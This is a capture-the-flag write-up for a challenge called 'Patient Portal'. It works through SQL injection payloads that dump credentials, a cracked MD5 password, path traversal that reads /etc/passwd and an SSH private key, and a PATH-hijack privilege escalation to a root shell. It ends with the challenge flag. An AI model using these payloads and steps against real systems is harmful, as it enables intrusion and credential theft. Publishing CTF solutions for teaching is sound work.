# Patient Portal | Field | Value | |-------|-------| | Category | Misc | | Difficulty | Medium-Hard | | Points | 500 | | Author | Eun0us | | CTF | Espilon 2026 | --- ## Description The WIRED-MED network at Clinique Sainte-Mika runs a patient portal for staff. Intelligence suggests the system was hastily deployed by contractor M. Eiri. Gain full control of the machine. **Ports:** - 8080: Web Portal (HTTP) - 2222: SSH Format: **ESPILON{flag}** --- ## TL;DR SQL injection on the `/search` endpoint to dump credentials and the SSH passphrase. Log in as admin, exploit path traversal on the report download endpoint to steal the SSH private key. SSH in as `webadmin`. Find a SUID binary that calls `logger` with a relative path. Hijack it via PATH injection to spawn a root shell and read the flag. --- ## Tools | Tool | Purpose | |------|---------| | Browser / `curl` | SQL injection, admin login, path traversal | | `hashcat` / CrackStation | MD5 crack for admin password | | `ssh` | Login as webadmin | | `bash` | PATH injection privilege escalation | --- ## Solution ### Stage 1 — SQL Injection The `/search?q=` endpoint is vulnerable to UNION-based injection with 6 columns. **Enumerate columns:** ``` /search?q=' UNION SELECT 1,2,3,4,5,6-- ``` **Discover tables:** ``` /search?q=' UNION SELECT 1,name,3,4,5,6 FROM sqlite_master WHERE type='table'-- ``` Tables: `patients`, `users`, `system_config` **Dump users:** ``` /search?q=' UNION SELECT 1,username,password_hash,role,5,6 FROM users-- ``` Results: - `admin` : MD5 hash `e0b7e413c064de43c6c1ca40a8c175a1` - `nurse01` : (irrelevant) **Dump system_config:** ``` /search?q=' UNION SELECT 1,key,value,3,4,5 FROM system_config-- ``` Key finding: `ssh_passphrase = wired-med-013` > 📸 `[screenshot: SQLi response showing the admin hash and ssh_passphrase rows]` **Crack the admin password:** ```bash echo -n "SainteMika2026" | md5sum # e0b7e413c064de43c6c1ca40a8c175a1 ``` Password: `SainteMika2026` --- ### Stage 2 — Admin Access Log in at `/login`: - Username: `admin` - Password: `SainteMika2026` The admin panel reveals: SSH port 2222, user `webadmin`. > 📸 `[screenshot: admin panel after login showing report links and system info]` --- ### Stage 3 — Path Traversal The `/admin/reports?file=` endpoint is vulnerable to path traversal. **Confirm user exists:** ``` /admin/reports?file=../../../etc/passwd ``` **Extract the SSH private key:** ``` /admin/reports?file=../../../home/webadmin/.ssh/id_rsa ``` Save the key to `id_rsa` locally. > 📸 `[screenshot: path traversal response returning the id_rsa private key]` --- ### Stage 4 — SSH Access ```bash chmod 600 id_rsa ssh -i id_rsa -p 2222 webadmin@ # Passphrase: wired-med-013 (from system_config) ``` --- ### Stage 5 — Privilege Escalation **Find SUID binaries:** ```bash find / -perm -4000 -type f 2>/dev/null ``` Found: `/opt/navi-monitor/vital-check` (SUID root) **Inspect the binary:** ```bash strings /opt/navi-monitor/vital-check | grep logger ``` The binary calls `system("logger -t vital-check 'check complete'")` using a **relative path** for `logger`. > 📸 `[screenshot: strings output confirming the relative logger call]` **Exploit via PATH hijacking:** ```bash echo '#!/bin/bash' > /tmp/logger echo '/bin/bash -p' >> /tmp/logger chmod +x /tmp/logger export PATH=/tmp:$PATH /opt/navi-monitor/vital-check ``` `bash -p` preserves the SUID effective UID, spawning a root shell. **Read the flag:** ```bash cat /root/root.txt ``` > 📸 `[screenshot: root shell reading /root/root.txt with the flag]` --- ## Flag `ESPILON{r00t_0f_s41nt3_m1k4}`